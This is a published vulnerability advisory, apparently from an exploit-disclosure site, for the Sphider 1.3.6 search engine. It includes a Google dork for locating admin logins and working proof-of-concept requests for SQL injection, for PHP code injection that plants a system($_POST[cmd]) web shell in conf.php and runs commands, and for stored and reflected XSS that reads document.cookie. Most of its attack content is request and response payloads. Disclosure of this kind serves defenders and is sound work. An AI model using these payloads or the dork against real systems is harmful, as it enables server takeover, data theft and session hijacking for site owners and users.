Sphider 1.3.6 or later SQL Injection

2014.08.09
Credit: Mike Manzotti
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89

# Exploit Title: Sphider 1.3.6 or later SQL Injection # Google Dork: intitle:"Sphider Admin Login" # Date: 1 July 2014 # Exploit Author: Mike Manzotti # Vendor Homepage: http://www.sphider.eu/ # Software Link: http://www.sphider.eu/sphider-1.3.6.zip # Version: v 1.3.6 Description: The web application is vulnerable to SQLi. Once a website has been indexed with Sphider, an attacker can inject SQL under Sites -> Browser pages-> filter option. Proof of Concept: Response: POST: /admin/admin.php per_page=10&filter='union+select+1,@@version+;#&start=1&site_id=1&f=21 Response: <tr class="grey"> <td><a href="5.5.35-0+wheezy1">5.5.35-0+wheezy1</a></td> <td width="8%"> [cid:image001.jpg@01CFAA73.0B6B8330] # Exploit Title: Sphider 1.3.6 or later PHP Injection Description: An authenticated user can inject PHP code in configuration settings. This would allow an attacker to take full control of the server. Note that in v1.3.5 authentication can be bypassed. Also note that this issue depends on permissions of "conf.php file". However during the installation the user is advised to change the permissions of "conf.php" file to chmod 666. Proof of Concept: Request: POST /admin/admin.php f=settings&Submit=1&_version_nr=1.3.5&_language=en&_template=standard&_admin_email=admin%40localhost&_print_results=1&_tmp_dir=tmp&_log_dir=log&_log_format=html&_min_words_per_page=10&_min_word_length=3&_word_upper_bound=100;system($_POST[cmd])&_index_numbers=1&_index_meta_keywords=1&_pdftotext_path=c%3A%5Ctemp%5Cpdftotext.exe&_catdoc_path=c%3A%5Ctemp%5Ccatdoc.exe&_xls2csv_path=c%3A%5Ctemp%5Cxls2csv&_catppt_path=c%3A%5Ctemp%5Ccatppt&_user_agent=Sphider&_min_delay=0&_strip_sessids=1&_results_per_page=10&_cat_columns=2&_bound_search_result=0&_length_of_link_desc=0&_links_to_next=9&_show_meta_description=1&_show_query_scores=1&_show_categories=1&_desc_length=250&_did_you_mean_enabled=1&_suggest_enabled=1&_suggest_history=1&_suggest_rows=10&_title_weight=20&_domain_weight=60&_path_weight=10&_meta_weight=5 "system($_POST[cmd])" has been injected. Request: POST http://URL/sphider/settings/conf.php cmd=pwd Response: /var/www/sphider/settings # Exploit Title: Sphider 1.3.6 or later Stored and Reflected XSS Description: The web application is prone to Stored and Reflected Cross site scripting. Stored XSS: Request: POST /admin/admin.php f=7&parent=&category=<script>alert(document.cookie)</script> Response <a href="admin.php?f=edit_cat&cat_id=1"> <script>alert(document.cookie) </script> </a> Reflected XSS: Request: POST /sphider/admin/admin.php f=index&adv=1&url="/><script>alert(document.cookie)</script> Response: <a href="admin.php?f=edit_cat&cat_id=1"> <script>alert(document.cookie) </script> </a> Solution: Currently none. The author has been informed. Timeline: 1 July 2014: The author has been informed 28 July 2014: Vulnerability published

References:

http://xforce.iss.net/xforce/xfdb/95016
http://www.sphider.eu/sphider-1.3.6.zip


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top